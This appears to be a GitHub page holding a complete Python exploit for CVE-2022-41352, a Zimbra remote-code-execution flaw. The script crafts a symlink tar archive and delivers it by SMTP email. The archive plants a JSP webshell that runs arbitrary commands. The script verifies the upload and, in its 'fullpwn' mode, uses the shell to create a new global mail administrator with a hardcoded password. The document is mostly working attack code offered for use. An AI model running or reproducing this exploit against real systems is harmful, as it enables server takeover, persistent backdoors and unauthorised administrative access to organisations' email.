-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathcve-2022-41352.py
236 lines (194 loc) · 8.78 KB
/
cve-2022-41352.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
#!/usr/bin/env python3
import sys
import smtplib
import argparse
from time import sleep
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
from email.mime.text import MIMEText
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# CONFIGURATION
#----------------------------------
TARGET = 'mail.test.org'
WEBSHELL_PATH = '/public/jsp'
WEBSHELL_NAME = 'Startup1_3.jsp'
ATTACHMENT = 'payload.tar'
SENDER = '[email protected]'
RECIPIENT = '[email protected]'
EMAIL_SUBJECT = 'CVE-2022-41352'
EMAIL_BODY = '<b>Just testing.</b><br><p>Don\'t mind me.</p>'
#----------------------------------
# Only change this if zimbra was not installed in the default location
UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra'
def create_tar_payload(payload, payload_name, payload_path, lnk='startup'):
# Block 1
link = lnk.encode()
mode = b'0000777\x00' # link permissions
ouid = b'0001745\x00' # octal uid (997)
ogid = b'0001745\x00' # octal gid
lnsz = b'00000000000\x00' # file size (link = 0)
lmod = b'14227770134\x00' # last modified (octal unix)
csum = b' ' # checksum = 8 blanks
type = b'2' # type (link = 2)
targ = payload_path.encode() # link target
magi = b'ustar \x00' # ustar magic bytes + version
ownu = b'zimbra' # user owner
owng = b'zimbra' # group owner
vers = b'\x00'*8 + b'\x00'* 8 # device major and minor
pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100)
raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod
raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref
# calculate and insert checksum
csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:]
raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2
# pad block to 512
raw_b1 += b'\00'*(512-len(raw_b1))
# Block 2
mode = b'0000644\x00' # file permissions
file = f'{lnk}/{payload_name}'.encode()
flsz = oct(len(payload))[2:] # file size
csum = b' ' # checksum = 8 blanks
type = b'0' # type (file = 0)
targ = b'\x00'*100 # link target = none
raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod
raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref
# calculate and insert checksum
csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:]
raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2
# pad block to 512
raw_b2 += b'\00'*(512-len(raw_b2))
# Assemble
raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512))
raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks
return raw_tar
# Update this if you want to use a legit email account for sending the payload
def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name):
msg = MIMEMultipart()
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = recipient
message = MIMEText(body, 'html')
msg.attach(message)
att = MIMEApplication(attachment)
att.add_header('Content-Disposition', 'attachment', filename=attachment_name)
msg.attach(att)
try:
print(f'>>> Sending payload')
smtp_server = smtplib.SMTP(target,25)
smtp_server.sendmail(sender, recipient, msg.as_string())
print(f'>>> Payload delivered')
except Exception as e:
print(f'[!] Failed to send the mail: {e}')
sys.exit(1)
def verify_upload(target, shell, path):
print(f'>>> Verifying upload to {path}/{shell} ...')
sleep(5) # give the server time to process the email
resp = requests.get(f'https://{target}{path}/{shell}', verify=False)
if resp.status_code == 200:
print(f'>>> [PWNED] Upload successful!')
else:
print(f'>>> Upload unsuccesful :(')
sys.exit(1)
def create_new_zimbra_admin(target, shell, path):
url = f'https://{target}'
pw = 'Pwn1ng_Z1mbra_!s_fun'
print(f'>>> Adding a new global administrator')
if (input(f'>>> Are you sure you want to continue? (yN): ') != 'y'):
sys.exit(0)
admin = input(f'>>> Enter the new admin email ([email protected]): ')
r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False)
r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False)
print(f'>>> Login to {url}:7071/zimbraAdmin/ with:')
print(f'>>> Email : {admin}')
print(f'>>> Password : {pw}')
def main(args):
global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY
# Kali JSP WebShell
payload = b'<FORM METHOD=GET ACTION="'
payload += WEBSHELL_NAME.encode()
payload += b'"><INPUT name="task" type=text><INPUT type=submit value="Run"></FORM><%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %><pre><%=output %></pre>'
# Using this instead of argparse default values to allow easy manual configuration as well
if args.payload:
try:
with open(args.payload, 'rb') as f:
payload = f.read()
except Exception as e:
print(f'Failed to read {args.payload}: {e}')
sys.exit(1)
print(f'>>> Using custom payload from: {args.payload}')
else:
print(f'>>> Using default payload: JSP Webshell')
if args.path:
WEBSHELL_PATH = args.path
if args.file:
WEBSHELL_NAME = args.file
if args.attach:
ATTACHMENT = args.attach
tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH)
print(f'>>> Assembled payload attachment: {ATTACHMENT}')
print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}')
if args.mode == 'manual':
with open(ATTACHMENT, 'wb') as f:
f.write(tar)
print(f'>>> Attachment saved locally.')
sys.exit(0)
if args.target:
TARGET = args.target
print(f'>>> Targeting {TARGET}')
if args.sender:
SENDER = args.sender
if args.recip:
RECIPIENT = args.recip
if args.subject:
EMAIL_SUBJECT = args.subject
if args.body:
try:
with open(args.body, 'rb') as f:
EMAIL_BODY = f.read().decode()
except Exception as e:
print(f'Failed to read {args.body}: {e}')
sys.exit(1)
print(f'>>> Using custom email body from: {args.body}')
smtp_send_file( TARGET,
SENDER,
RECIPIENT,
EMAIL_SUBJECT,
EMAIL_BODY,
tar,
ATTACHMENT )
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH)
print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}')
if args.mode == 'auto':
sys.exit(0)
if args.payload:
print(f'>>> (!) "fullpwn" depends on the default JSP webshell - won\'t create the admin account')
else:
create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH)
sys.exit(0)
if __name__ == '__main__':
epi = '''
Alternatively, edit the script to change the default configuration.
The available modes are:
manual : Only create the payload - you have to deploy the payload yourself.
auto : Create a webshell and deploy it via SMTP.
fullpwn : After deploying a webshell, add a new global mail administrator.
'''
p = argparse.ArgumentParser(
description = 'CVE-2022-41352 Zimbra RCE',
formatter_class = argparse.RawDescriptionHelpFormatter,
epilog = epi
)
p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below')
p.add_argument('--target', required=False, metavar='<str>', dest='target', help=f'the target server (default: "{TARGET}")')
p.add_argument('--payload', required=False, metavar='<file>', help='the file to save on the target (default: jsp webshell)')
p.add_argument('--path', required=False, metavar='<str>', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")')
p.add_argument('--file', required=False, metavar='<str>', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")')
p.add_argument('--attach', required=False, metavar='<str>', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")')
p.add_argument('--sender', required=False, metavar='<str>', help=f'sender mail address (default: "{SENDER}")')
p.add_argument('--recip', required=False, metavar='<str>', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)')
p.add_argument('--subject', required=False, metavar='<str>', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")')
p.add_argument('--body', required=False, metavar='<file>', help=f'file containing the html content for the email body (default: "{EMAIL_BODY}")')
args = p.parse_args()
main(args)